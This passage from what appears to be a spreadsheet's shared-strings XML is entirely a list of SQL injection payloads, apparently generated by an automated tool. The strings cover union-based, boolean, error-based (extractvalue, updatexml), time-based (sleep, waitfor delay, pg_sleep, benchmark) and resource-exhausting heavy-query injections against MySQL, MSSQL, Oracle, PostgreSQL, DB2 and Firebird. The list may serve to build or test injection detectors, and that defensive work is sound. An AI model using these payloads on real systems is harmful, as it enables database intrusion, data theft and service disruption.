    <t>1  )  )   as izvy where 2569 = 2569</t>
  </si>
  <si>
    <t>-4494 or 5291 = 4452</t>
  </si>
  <si>
    <t>-9734'  )  )   as izbx where 6273 = 6273 union all select 6273,6273,6273,6273,6273,6273,6273,6273,6273--</t>
  </si>
  <si>
    <t>1  )  )   as fynx where 9636 = 9636 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-8382"  )  )   order by 1--</t>
  </si>
  <si>
    <t>1" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "fbqy" like "fbqy</t>
  </si>
  <si>
    <t>1" where 3510 = 3510</t>
  </si>
  <si>
    <t>select  ( case when  ( 4636 = 1108 )  then 1 else 4636* ( select 4636 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-1164" )  union all select 6617,6617,6617,6617,6617,6617--</t>
  </si>
  <si>
    <t>1'|| ( select 'cjwx' from dual where 7637 = 7637 and elt ( 9548 = 3991,3991  )  )  ||'</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( 'yauq' = 'yauq</t>
  </si>
  <si>
    <t>1 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>-6554'  )  )   )  union all select 4384,4384,4384,4384,4384#</t>
  </si>
  <si>
    <t>1"  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  as ybuv where 9641 = 9641 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%' and 9127 = 7687--</t>
  </si>
  <si>
    <t>1" where 5796 = 5796 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "gvlc" like "gvlc</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>1" )  where 2633 = 2633 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 9432 = 9432 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1  )  )   and 7533 = 7533 and   (  (  8738 = 8738</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as szxa where 1501 = 1501 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-3445 union all select 5505,5505,5505--</t>
  </si>
  <si>
    <t>1" )  where 7723 = 7723 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1' )  and make_set ( 4551 = 6487,6487 )  and  ( 'jnqa' = 'jnqa</t>
  </si>
  <si>
    <t>select  ( case when  ( 1272 = 5883 )  then 1272 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-7565'  )  )   union all select 7745,7745,7745,7745,7745,7745#</t>
  </si>
  <si>
    <t>-9405' union all select 2539--</t>
  </si>
  <si>
    <t>1%" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-5058%' union all select 6789,6789,6789,6789,6789#</t>
  </si>
  <si>
    <t>1' )  where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>select case when 5433 = 6458 then 1 else null end--</t>
  </si>
  <si>
    <t>1'+ ( select ouhd where 8905 = 8905 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>-1432 order by 1#</t>
  </si>
  <si>
    <t>-6496" )  as obnf where 2903 = 2903 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1' )  where 7640 = 7640 and make_set ( 8978 = 8594,8594 ) --</t>
  </si>
  <si>
    <t>-8053" where 5458 = 5458 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%" and  ( 3020 = 3020 ) *6703 and "%" = "</t>
  </si>
  <si>
    <t>1' where 6147 = 6147  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1"  )  )   as ynuw where 9138 = 9138</t>
  </si>
  <si>
    <t>1"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "opgb" like "opgb</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 )  where 5465 = 5465 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "dnmi" like "dnmi</t>
  </si>
  <si>
    <t>1 where 6827 = 6827</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'msjw' like 'msjw</t>
  </si>
  <si>
    <t>-7744"  )  )   )  union all select 9408,9408,9408,9408--</t>
  </si>
  <si>
    <t>1'  )  )   as yyud where 4934 = 4934</t>
  </si>
  <si>
    <t>-5625" union all select 6087,6087,6087,6087,6087,6087--</t>
  </si>
  <si>
    <t>1" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "bmbg" like "bmbg</t>
  </si>
  <si>
    <t>-7611 )  as tuje where 6101 = 6101 union all select 6101,6101,6101,6101,6101,6101,6101,6101--</t>
  </si>
  <si>
    <t>1%' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and '%' = '</t>
  </si>
  <si>
    <t>-1676'|| ( select 'xzmu' from dual where 6373 = 6373 union all select 6373,6373--</t>
  </si>
  <si>
    <t>-2402 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   a</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</si>
  <si>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</si>
  <si>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1'  )  )   as kdwc where 5906 = 5906 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 9618 = 9618 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>1%"  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'gtqr' where 5660 = 5660</t>
  </si>
  <si>
    <t>1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  -- rlas</t>
  </si>
  <si>
    <t>-7231  )  )   union all select 7639#</t>
  </si>
  <si>
    <t>1" )  as lvbm where 8179 = 8179</t>
  </si>
  <si>
    <t>1'+ ( select kpso where 1226 = 1226 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'odud' from dual where 2468 = 2468 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%"</t>
  </si>
  <si>
    <t>1" where 2677 = 2677 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>-7746' )  union all select 1998,1998,1998,1998,1998,1998,1998,1998#</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 6847 = 5874,5874 )  and   (  (  'yspu' = 'yspu</t>
  </si>
  <si>
    <t>1" )  as tnux where 4888 = 4888 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>-9311  )  )   or  ( 5065 = 2572 ) *2572 and   (  (  1199 = 1199</t>
  </si>
  <si>
    <t>-6406%' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 12</t>
  </si>
  <si>
    <t>1" )  as jaxh where 6318 = 6318 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1 )  as rlft where 1670 = 1670 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   as dtwh where 9633 = 9633 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2167'  )  )   )  union all select 3804,3804,3804,3804,3804,3804#</t>
  </si>
  <si>
    <t>1%" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>-2140  )  )   union all select 8174,8174,8174#</t>
  </si>
  <si>
    <t>1 )  and 8417 = 5276#</t>
  </si>
  <si>
    <t>1"  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "vhey" = "vhey</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4541"  )  )   or make_set ( 4821 = 5233,5233 )  and   (  (  "xfex" = "xfex</t>
  </si>
  <si>
    <t>1 and 9412 = 6877#</t>
  </si>
  <si>
    <t>-2549' )  as zfnf where 1993 = 1993 union all select 1993,1993,1993,1993,1993,1993--</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and 'zfyy' = 'zfyy</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # cdjm</t>
  </si>
  <si>
    <t>1' in boolean mode )  and elt ( 1210 = 1210,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1 and make_set ( 8403 = 8403,8899 ) </t>
  </si>
  <si>
    <t>1  )  )   as debc where 7428 = 7428 union all select null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'xpjg' where 3036 = 3036 and elt ( 1832 = 6644,6644  )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  'ayqn' like 'ayqn</t>
  </si>
  <si>
    <t>1  )  )   and elt ( 9288 = 6067,6067 )  and   (  (  1895 = 1895</t>
  </si>
  <si>
    <t>-9566%" )  union all select 7973,7973,7973,7973--</t>
  </si>
  <si>
    <t>-6279' )  union all select 3026,3026,3026,3026,3026,3026,3026,3026--</t>
  </si>
  <si>
    <t>1"  )  )   as dksq where 7161 = 7161</t>
  </si>
  <si>
    <t>1" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "vudj" like "vudj</t>
  </si>
  <si>
    <t>-3278'  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  'zxig' like 'zxig</t>
  </si>
  <si>
    <t>1"  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'+ ( select gthp where 7311 = 7311 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-5478" )  where 4100 = 4100 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>select  ( case when  ( 5796 = 8326 )  then 5796 else 5796* ( select 5796 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1" where 3247 = 3247 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'+ ( select zpdf where 2938 = 2938</t>
  </si>
  <si>
    <t>1'|| ( select 'epjr' from dual where 3074 = 3074 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1%' and elt ( 7619 = 1489,1489 )  and '%' = '</t>
  </si>
  <si>
    <t>-8698" where 1990 = 1990 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1' )  as pudv where 2609 = 2609</t>
  </si>
  <si>
    <t>if ( 1928 = 4811 )  select 1928 else drop function ucko--</t>
  </si>
  <si>
    <t>-8588' union all select 2135,2135--</t>
  </si>
  <si>
    <t>1' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'cdgm' like 'cdgm</t>
  </si>
  <si>
    <t>-7065'+ ( select 'bdxr' where 1756 = 1756 union all select 1756,1756,1756,1756,1756,1756,1756,1756,1756,1756#</t>
  </si>
  <si>
    <t>-8988"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1' )  where 7658 = 7658 union all select null,null#</t>
  </si>
  <si>
    <t>1' in boolean mode )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' )  as mwpp where 6192 = 6192</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "urgd" = "urgd</t>
  </si>
  <si>
    <t>-6789'|| ( select 'uckz' from dual where 2163 = 2163 union all select 2163,2163,2163,2163,2163,2163--</t>
  </si>
  <si>
    <t>1" )  where 9570 = 9570 rlike  ( select  ( case when  ( 1642 = 3686 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  "zzmn" = "zzmn</t>
  </si>
  <si>
    <t>1" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "mmgx" like "mmgx</t>
  </si>
  <si>
    <t>1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- wynp</t>
  </si>
  <si>
    <t>-8523 )  as hzqs where 8944 = 8944 order by 1--</t>
  </si>
  <si>
    <t>-7279 )  or 9898 = 9963 and  ( 1481 = 1481</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null--</t>
  </si>
  <si>
    <t>-7812' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>-6712'  )  )   as kqff where 9146 = 9146 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'sppw' where 1677 = 1677 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t>-2916"  )  )   or 4946 = 8232--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 7219 = 7361 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%' rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-5218 )  union all select 9677,9677#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-5300' union all select 2750,2750,2750,2750,2750,2750--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "jcyh" = "jcyh</t>
  </si>
  <si>
    <t>1'|| ( select 'xqqp' where 3007 = 3007 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'sfko' where 6853 = 6853 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-7101  )  )   )  union all select 4587,4587,4587,4587,4587,4587--</t>
  </si>
  <si>
    <t>-4947' in boolean mode )  union all select 3314,3314#</t>
  </si>
  <si>
    <t>1'|| ( select 'dbxr' where 4014 = 4014 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  4090 = 4090</t>
  </si>
  <si>
    <t>-4684 )  as uqjn where 4550 = 4550 or 1689 = 5825</t>
  </si>
  <si>
    <t>1'  )  )   as namw where 1740 = 1740 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>1' where 2911 = 2911</t>
  </si>
  <si>
    <t>select  ( case when  ( 7980 = 3703 )  then 7980 else 7980* ( select 7980 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  7805 = 7805</t>
  </si>
  <si>
    <t>-6733' )  where 4024 = 4024 union all select 4024,4024,4024,4024#</t>
  </si>
  <si>
    <t>1"  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1%" )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-5158'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  'noaj' like 'noaj</t>
  </si>
  <si>
    <t>1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "cxsu" like "cxsu</t>
  </si>
  <si>
    <t>1" )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "vnso" like "vnso</t>
  </si>
  <si>
    <t>-2059%" or elt ( 4587 = 3101,3101 )  and "%" = "</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>1%" and 5411 = 7697 and "%" = "</t>
  </si>
  <si>
    <t>-3725'  )  )   union all select 1541,1541,1541,1541,1541#</t>
  </si>
  <si>
    <t>1  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-6478"  )  )   union all select 7087,7087,7087,7087,7087,7087,7087,7087--</t>
  </si>
  <si>
    <t>-3450' where 4478 = 4478 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t xml:space="preserve">1 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t xml:space="preserve">-3378'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>-6368' union all select 6529,6529,6529--</t>
  </si>
  <si>
    <t>-2417 )  union all select 2169,2169,2169,2169,2169,2169,2169,2169,2169,2169#</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  "grct" = "grct</t>
  </si>
  <si>
    <t>1" )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  where 3861 = 3861</t>
  </si>
  <si>
    <t>1' )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and 'hokd' = 'hokd</t>
  </si>
  <si>
    <t>1" )  where 3507 = 3507</t>
  </si>
  <si>
    <t>1'  )  )   as cjjm where 1981 = 1981</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'mmow' = 'mmow</t>
  </si>
  <si>
    <t>1'|| ( select 'dajl' from dual where 8440 = 8440</t>
  </si>
  <si>
    <t>-5386' )  union all select 8026,8026,8026,8026,8026,8026#</t>
  </si>
  <si>
    <t>1"  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "vypw" like "vypw</t>
  </si>
  <si>
    <t>1 )  as qkkm where 8461 = 8461</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  where 8630 = 8630 union all select null,null--</t>
  </si>
  <si>
    <t>-5580 or 4829 = 1968</t>
  </si>
  <si>
    <t>1"  )  )   as ogzn where 6849 = 6849 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'+ ( select uhsy where 4596 = 4596 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'</t>
  </si>
  <si>
    <t>1  )  )   as zdbj where 2300 = 2300  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 8126 = 8126</t>
  </si>
  <si>
    <t>1 )  where 7729 = 7729</t>
  </si>
  <si>
    <t>-2116%'  )  )   )  union all select 7119,7119,7119,7119,7119--</t>
  </si>
  <si>
    <t>-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1'+ ( select ounb where 4653 = 4653 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t>1  )  )   as goar where 2405 = 2405 and 5927 = 9731--</t>
  </si>
  <si>
    <t>1" where 1831 = 1831 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1" )  as pydh where 3407 = 3407 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-9555'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'rwpq' like 'rwpq</t>
  </si>
  <si>
    <t>1'+ ( select tart where 9861 = 9861</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) </t>
  </si>
  <si>
    <t>1'+ ( select 'dpun' where 4760 = 4760</t>
  </si>
  <si>
    <t>1"  )  )   as vigs where 6175 = 6175 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 'zxrb' = 'zxrb</t>
  </si>
  <si>
    <t>-4054" or 2824 = 4788--</t>
  </si>
  <si>
    <t>1'|| ( select 'mlwj' from dual where 4247 = 4247 and 1702 = 8469 ) ||'</t>
  </si>
  <si>
